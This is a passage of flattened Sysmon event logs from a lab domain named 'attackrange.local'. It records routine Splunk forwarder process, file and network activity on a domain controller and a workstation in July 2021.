AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8E82F1AD4A3B5B269D45C1CB300EE52,SHA256=1C70FD42CC48101C9D88B56302063ADB41EDB904C940DDA2854A22F473480850,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047918Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:53.500{466BC892-F421-60EB-1A7D-00000000CF01}74008732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047917Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:53.332{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F421-60EB-1A7D-00000000CF01}7400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047916Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:53.332{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047915Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:53.316{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047914Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:53.316{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047913Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:53.316{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047912Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:53.316{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F421-60EB-1A7D-00000000CF01}7400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047911Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:53.316{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F421-60EB-1A7D-00000000CF01}7400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047910Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:53.317{466BC892-F421-60EB-1A7D-00000000CF01}7400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047929Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:54.617{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD48A3D7A4C77D774776D6350D4CD8E3,SHA256=88191969DD3553E991DEE69177B5EF63D158F13CF672A917B5073FEA04A67BD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807126Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:54.256{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D56B774597C35228B213E821B601AB19,SHA256=E3E918FAFD5A35662391CD2723E15EDAAA26040001C177FB3CFC7AC4A6DC2EF9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047928Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:54.003{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F421-60EB-1B7D-00000000CF01}9468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047927Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:54.003{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047926Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:54.003{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047925Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:54.003{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047924Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:54.003{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047923Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:54.003{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F421-60EB-1B7D-00000000CF01}9468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047922Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:54.003{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F421-60EB-1B7D-00000000CF01}9468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047921Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:53.997{466BC892-F421-60EB-1B7D-00000000CF01}9468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047931Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:55.619{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ECE9FBEDF7720084FE7FEAAF00C0216,SHA256=153A6E4B6F85B3A32907B510FB2A810C26B32815E65028D049ECB13842125A92,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807128Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:54.248{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57233-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807127Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:55.256{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB23C346FDDB66FD0DB58DF00E6B4D50,SHA256=0F3ACFBD8E6EB291B7F5B79C91B040B25F4CE0C75F790F60E8F83FF4D86BF741,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047930Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:55.019{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F478733F0285A18219334F10E247FDC,SHA256=FFC191B3169C68EF797206E33C0F41AF166AAACD38CCF4DA9B0593453E9138E8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047934Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:47.783{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50992-false10.0.1.12-8000- 23542300x80000000000000001047933Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:56.901{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047932Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:56.634{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80394B817D91E18C3089EE97AE0BD21F,SHA256=8C64122E85959C96670D2A15B5733873E9FB387DEEE9B0646F7C861DF5758F32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807129Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:56.271{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3A4E5D28A378B14D8E1B2D6315B6299,SHA256=A4C6F053A6F168A325289FA77D2ABB9C4BAFD97948402BE48A3D39AE4A893B50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807130Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:57.271{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96BD9F651E1F99252BF06C5595D9C061,SHA256=BC97164CBA011FA3365B9DF8007FFBE9F5352FD360EF2A71757FAF1A4CEA988B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047936Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:57.649{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40C41EF692FA60C02E425EF3AC8045E8,SHA256=AE5E0698DED4E96BEBF5481145744457F4F54CD1DFA8A603DA21BCEB1AB19B42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047935Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:57.198{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=FCB0CFEB74D7EFEAD54C3F1C2E7C7FEF,SHA256=4FF533C44F74FDEA4769C00B85E7E522267A039D110178B537033963E4F91E8B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047939Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.430{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50993-false10.0.1.12-8089- 23542300x80000000000000001047938Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:58.679{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A03F42A3327D284513D5ACD103FC6224,SHA256=668020E2C80CB696FF24107A984DF7514AAC557A14B241C03F18DAD166A1B523,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807131Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:58.271{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=370422F6E02BAC509CE34A6F05ADE402,SHA256=72F50914318A527F10553542E6B624698F665A4403D8A9F3C8F026BF6C6806D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047937Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:58.417{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0C1A6B376E2CABBBDCB147497206F948,SHA256=DEDC4A60552932CFB7478D932E389565039CA2D636DA3A6CF9F02B73AA53E23B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047940Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:59.698{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=990BBB1A16A53A03F1682DA23074AC26,SHA256=11384024174A5148A85BEC663E417D2405ED56F791CB108E766B549AAA20D7F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807132Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:59.271{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89F04AB4163524B5020E7D6F620AF0A6,SHA256=C28A8948C454A2B6102B4B05E5C928E4194F7A3D4DE28AB557C7E3F1775322F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047942Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:00.717{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=867D05876C9CE43804FBC724EBCF5193,SHA256=E876C636308146788987C5F4C9C04B2B3FF2725862479059F61B290E4E77A4C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807133Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:00.287{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 